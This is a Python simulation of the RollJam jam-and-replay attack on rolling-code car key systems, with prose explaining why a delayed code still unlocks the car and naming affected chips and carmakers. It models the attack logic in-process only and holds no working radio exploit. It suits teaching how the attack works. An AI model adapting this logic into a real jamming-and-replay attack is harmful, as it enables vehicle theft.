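"""RollJam-style jam-and-replay against a rolling-code receiver (simulation).

Added example, not the RollJam firmware. The code format, window size and
secret below are assumed for illustration.
"""
import hashlib
import hmac

WINDOW = 16  # assumed: receiver accepts counters up to 16 ahead of the last seen one


def rolling_code(secret: bytes, counter: int) -> bytes:
    """Code transmitted for a counter value (stand-in for a KeeLoq hop code)."""
    return hmac.new(secret, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:4]


class KeyFob:
    def __init__(self, secret: bytes):
        self.secret = secret
        self.counter = 0

    def press(self) -> bytes:
        """Each button press advances the counter and emits a fresh one-time code."""
        self.counter += 1
        return rolling_code(self.secret, self.counter)


class Car:
    def __init__(self, secret: bytes, window: int = WINDOW):
        self.secret = secret
        self.window = window
        self.last_counter = 0  # highest counter already accepted

    def receive(self, code: bytes) -> bool:
        """Accept a code only if it maps to an unused counter inside the window."""
        for counter in range(self.last_counter + 1, self.last_counter + 1 + self.window):
            if hmac.compare_digest(code, rolling_code(self.secret, counter)):
                self.last_counter = counter  # this and every older code are now dead
                return True
        return False


class RollJam:
    """Jams the fob's transmission so the car never hears it, while recording it."""

    def __init__(self):
        self.captured = []  # codes the car has not seen yet

    def jam_and_capture(self, code: bytes) -> None:
        self.captured.append(code)  # the car receives nothing on this press


def run_rolljam_demo() -> dict:
    secret = b"constructed-shared-fob-secret"  # assumed: fob and car share this
    fob, car, attacker = KeyFob(secret), Car(secret), RollJam()

    # Baseline: an honest press unlocks once; replaying the same code fails
    # because the receiver has already moved past its counter.
    honest = fob.press()
    honest_unlock = car.receive(honest)
    plain_replay_rejected = not car.receive(honest)

    # Press 1: jammed and recorded, the car never sees code_1.
    code_1 = fob.press()
    attacker.jam_and_capture(code_1)

    # Press 2: jammed and recorded too, then code_1 is replayed at once.
    # code_1 is unused and inside the window, so the car unlocks and the
    # owner believes the second press worked.
    code_2 = fob.press()
    attacker.jam_and_capture(code_2)
    first_replay_unlocked = car.receive(attacker.captured[0])

    # Later, with the owner gone, code_2 is still ahead of the car's counter.
    stored_code_unlocked = car.receive(attacker.captured[1])

    # The stolen code is single use: a second replay of code_2 is rejected.
    reuse_rejected = not car.receive(attacker.captured[1])

    return {
        "honest_unlock": honest_unlock,
        "plain_replay_rejected": plain_replay_rejected,
        "first_replay_unlocked": first_replay_unlocked,
        "stored_code_unlocked": stored_code_unlocked,
        "reuse_rejected": reuse_rejected,
    }


if __name__ == "__main__":
    for name, value in run_rolljam_demo().items():
        print(f"{name}: {value}")
```

The receiver in the simulation does everything a rolling-code scheme promises: it never accepts a code twice and never accepts an old one. The attack still succeeds because the receiver has no way to tell a code that was delayed by the attacker from one the owner just sent; jamming turns a one-time code into a token the attacker can spend later.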

RollJam works on several cars: Kamkar found that the attack works against widely adopted chips, including the High-Security Rolling Code Generator made by National Semiconductor and the KeeLoq access control system from Microchip Technology.

Car makers whose vehicles are vulnerable to the RollJam device include Chrysler, Fiat, Honda, Toyota, Daewoo, GM, Volvo, the Volkswagen Group, and Jaguar.